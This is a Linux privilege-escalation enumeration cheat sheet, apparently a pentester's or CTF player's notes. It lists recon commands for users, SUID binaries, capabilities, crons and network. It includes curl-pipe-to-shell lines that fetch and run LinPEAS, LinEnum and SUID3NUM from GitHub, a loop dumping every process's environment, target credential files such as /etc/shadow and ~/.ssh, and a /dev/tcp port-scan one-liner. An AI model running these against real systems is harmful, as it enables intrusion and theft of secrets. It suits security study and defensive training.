Enum

Things to do

Basic enum
https://book.hacktricks.xyz/linux-hardening/privilege-escalation
https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#references

# First things to check
id # Whoami & groups
cat /etc/issue /etc/os-release # OS
uname -a # Always check online for CVE
cat /etc/passwd # Users
cat /etc/fstab # Mount points
ps faxwu | cat # Processes tree
lscpu # Architecture
cat /etc/shells # Available shells
cat /etc/group|grep -v ':$' # Group with members
getent group sudo # sudo members

# System activity
lastlog
w

# System services and installations
dpkg -l | cat # Installed packages
systemctl --type=service | cat # List services

# Network
ss -lapunte | cat
netstat -ntlp | cat
ip a
ip route
route
routel
cat /etc/iptables/rules.v4
iptables -L
arp -a

# Files
ls -ltrha / /opt /srv /home/* /root/
ls -ltrha /tmp /var/tmp /dev/shm
ls -ltrha /var/www/*
find /home/ -type f -printf '%T@ %p\n' | sort -nr | head -20 # Recent files
find /home/ -type f -printf '%T@:%TY-%Tm-%Td %TH:%TM %p\n'|sort -n|cut '-d:' -f2-
find /home/ -type f -size +0
find /home -type f -size +0 -name ".*" -exec ls -l {} \; 2>/dev/null # Hidden files
find /home -type d -name ".*" -ls 2>/dev/null # Hidden dirs
sudo -l # if you need TTY : python3 -c 'import pty; pty.spawn("/bin/bash")'
find / -perm -4000 -exec ls -ldb {} \; 2>/dev/null # Find all user SUID binaries
find / -perm -6000 -exec ls -ldb {} \; 2>/dev/null # Find all group SUID binaries
find /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin -type f -exec getcap {} \; # Capabilities
find / -perm -u=s -type f 2>/dev/null
find / -type f \( -user userblabla -o -group userblabla \) -size +0 -exec file {} + 2>/dev/null
mount
lsblk
find / -writable -type d 2>/dev/null
cat ~/.bashrc
/usr/sbin/getcap -r / 2>/dev/null
cat /etc/fstab | grep -v "#" | column -t # Unmounted File Systems

# Env by process
cd /proc/ ; for i in [0-9]* ; do echo -e "\n## $i $(ps -fp $i 2>/dev/null)" ; cat $i/environ 2>/dev/null | tr '\0' '\n' | strings ; done

# Crons
ls -lah /etc/cron*
crontab -l
grep "CRON" /var/log/syslog

# App armor status
aa-status

# Modules
lsmod
/sbin/modinfo interestingmodule

Scripts

LinPEAS

curl https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh | sh

LinEnum

curl https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh | sh

SUID Enum

Enum SUID program with python2/3 built-in modules

https://github.com/Anon-Exploiter/SUID3NUM

curl https://raw.githubusercontent.com/Anon-Exploiter/SUID3NUM/master/suid3num.py | python

Watch Process

Watch for existing and new process

https://github.com/DominicBreuker/pspy

Interesting Files

Public

#
/etc/issue
/etc/passwd
/etc/group

Root

#
/etc/sudoers
/etc/shadow
/etc/master.passwd # OpenBSD

/var/spool/cron/crontabs/*
/var/spool/cron/*

User

#
/home/*/.bash_history
/home/*/.ssh/*

Auditd (adm)

When parsing audit logs you may encounter hex encoded data

for VAR in cmd data ; do
  for DATA in $(grep "$VAR=[^\"]" /var/log/audit/audit.log*) ; do
    echo "$DATA" | sed "s#.*$VAR=\([^ ]*\).*#\1#" | xxd -r -p | tr -dc '[:print:]\t\n' | echo $(cat)
  done
done

Scan Ports

Retrieve hidden ports without scanner/netstat

bash -c 'for i in {1..65535};do echo>/dev/tcp/127.0.0.1/$i&&echo OK $i;done' 2>/dev/null

Binaries

When you encounter binaries without knowing what it does you can use strace to list system calls

strace binaryname